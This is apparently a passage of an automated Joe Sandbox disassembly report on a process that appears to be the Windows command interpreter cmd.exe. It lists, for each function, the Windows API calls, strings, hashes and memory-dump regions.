                                        • Instruction ID: 9dc8317a1de584d270973856201a4efd1fc7ed60b19a5814ba1f78276d8a0196
                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction Fuzzy Hash: 88015221B0CA429AEA047F56A444178FE61EB5A761FC46170DE6F06355EF3C91448B20
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorMode$FullNamePathwcschr
                                        • String ID:
                                        • API String ID: 1464828906-0
                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction ID: ac25019f9a086734ea65ca7854a2d03bef520ecf219e55c45c08863e416080cb
                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction Fuzzy Hash: 4531B121B0C65186E724AF56A40487EF666EB46BB0FD88135DF6A433E0FE7DEA458310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                        • API String ID: 2221118986-3416068913
                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction ID: 456e0d7ef2fa96da204cd4c8e6b2dc9efae1961007f89ff22fde948ce0e5b69f
                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction Fuzzy Hash: B911C621B0CA4281EF54EF56A5543B9A2919F88BF4F984231DF7D4B7D5FE2CD6804320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcschr
                                        • String ID: 2$COMSPEC
                                        • API String ID: 1764819092-1738800741
                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction ID: d1c33f23c626ab1afd69d19803f46a345b10e057b62c44db5503088fa6b027fb
                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction Fuzzy Hash: E0516721B0C7424DFB61BE21A841379A3959F947E4F884031DF2DC2296FF2CEA84C762
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                        • String ID:
                                        • API String ID: 4254246844-0
                                        • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                        • Instruction ID: 9e03c497e47dd2db37088e7519ea907d38cebee0077392523d1912e4a6183d46
                                        • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                        • Instruction Fuzzy Hash: F941B521B0D64286EA10AF02E444B79FBA6EF85774FC84531DF6D47789FE3CE6458620
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                        • String ID:
                                        • API String ID: 2643372051-0
                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction ID: 72132c771c915d95690a7f4e91faf661eb74fd82ae95d44ea265b864f1bfeb28
                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction Fuzzy Hash: 4EF04471B1DA4185DA00AF76E404075EAA2FF99770B959234CE7D03390EE3C95448110
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleMode
                                        • String ID:
                                        • API String ID: 1591002910-0
                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction ID: 3ee5a69df7da1185df661c73517019a5d84c8c06ae35e008189bc65897c6b89d
                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction Fuzzy Hash: 28F07A35B0DA02DBE604AF91E845078BBA1FBD9721F844135CF1E43310EF3CA6058B10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DriveType
                                        • String ID: :
                                        • API String ID: 338552980-336475711
                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction ID: 87b4f97b760e773a23a39c48b0277e9dea9a196d5fc726670a0d5a5fb18d96fb
                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction Fuzzy Hash: 24E0E56371CA0086D7209F50E05106AF761FB9C318FC41524DE9D83724EB3CC249CB08
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7CD495B52
                                          • Part of subcall function 00007FF7CD494224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494297
                                          • Part of subcall function 00007FF7CD494224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4942D7
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD4942FD
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD494368
                                          • Part of subcall function 00007FF7CD494224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494380
                                          • Part of subcall function 00007FF7CD494224: wcsrchr.MSVCRT ref: 00007FF7CD4943E6
                                          • Part of subcall function 00007FF7CD494224: lstrcmpW.KERNELBASE ref: 00007FF7CD494401
                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7CD495BC7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                        • String ID:
                                        • API String ID: 497088868-0
                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction ID: 6f6469b6073026cebfd4c324978a8a0876d546d0810f3499dae31ddee4b5754b
                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction Fuzzy Hash: 87319720B0C64242FA24BF12A45457DE296BF89BE0FD45031DF6E87B95FE3CE6028720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmalloc
                                        • String ID:
                                        • API String ID: 1412018758-0
                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction ID: 02aa12de019a37a8b458d10e0604f4885602a00dc45c2cf7b63cce609703c7a4
                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction Fuzzy Hash: 56E06D00F1E64792FE243FA36882874925E9F68760E882430CF2D09382FE2CA6918330
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction ID: 665d4d8a76e0bd1e3be719bd5617b54233f49474fe0f463b78125bab61b63f25
                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction Fuzzy Hash: F2F01D31B1C64286EB04AF16F844078FBA5FB89B51B989434DE6E43754EF3CE641C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: exit
                                        • String ID:
                                        • API String ID: 2483651598-0
                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction ID: 0de905efbdc0fb956a2c68e44b535960376190e33aac867641d6b0a3cfe0dd51
                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction Fuzzy Hash: 54C0123070C6465BEB2C7F726455439955A5B19211F45543CCF2A81282ED28D5058A14
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DefaultUser
                                        • String ID:
                                        • API String ID: 3358694519-0
                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction ID: 86b24a08f6114743cff31c529974209a3cac3da26f3b4ea312e94688334b88ee
                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction Fuzzy Hash: 2CE0C2E2F0C2638AF5543F8364457B4999BCB787B2FD44031CF2D012CA692DAA415229
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: __getmainargs
                                        • String ID:
                                        • API String ID: 3565562838-0
                                        • Opcode ID: b6f5cdf5722783bf56140b72c494151407bd75dd9d900e70dce4adf5245e8247
                                        • Instruction ID: 0d80ff798e6b60c4d071210c2c7db776b56b113a4a1a0a17445268a65ea0ecee
                                        • Opcode Fuzzy Hash: b6f5cdf5722783bf56140b72c494151407bd75dd9d900e70dce4adf5245e8247
                                        • Instruction Fuzzy Hash: B7E04C75B0CE87A5EA08AF90E9404A0B760AB34324BC051F1CE6E52224EF3CA356CB20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction ID: 042905ca52286c0116e85e5b7364156340eb70640ca9f18893b4851a26261b8e
                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction Fuzzy Hash: A8F0B421B0D78140EE54AF57B58012A92959B4CBF0B888334EF7C47BC9EE3CD5518300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                        • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                        • API String ID: 1388555566-2647954630
                                        • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                        • Instruction ID: 892879dbaff06a1fb6f97af9d2b0d4c35c49dbcaf40a81ff23316af04eacf1dc
                                        • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                        • Instruction Fuzzy Hash: 58A28231B0CB8286EB10AF65A8141B9B7A2FB497A4F848135DF2E47795FF3CE6448710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                        • String ID: &<|>$+: $:$:EOF$=,;$^
                                        • API String ID: 511550188-726566285
                                        • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                        • Instruction ID: d5a1f9d1d850b8cc7c6cfbd9aa183ccb4ae9c9dde1e1838d2f1a179e3ec8e819
                                        • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                        • Instruction Fuzzy Hash: BF52C122F0C69286EB24AF169804679FAA1FB857A4FC44135DF6E47794FF3DE6408720
                                        APIs
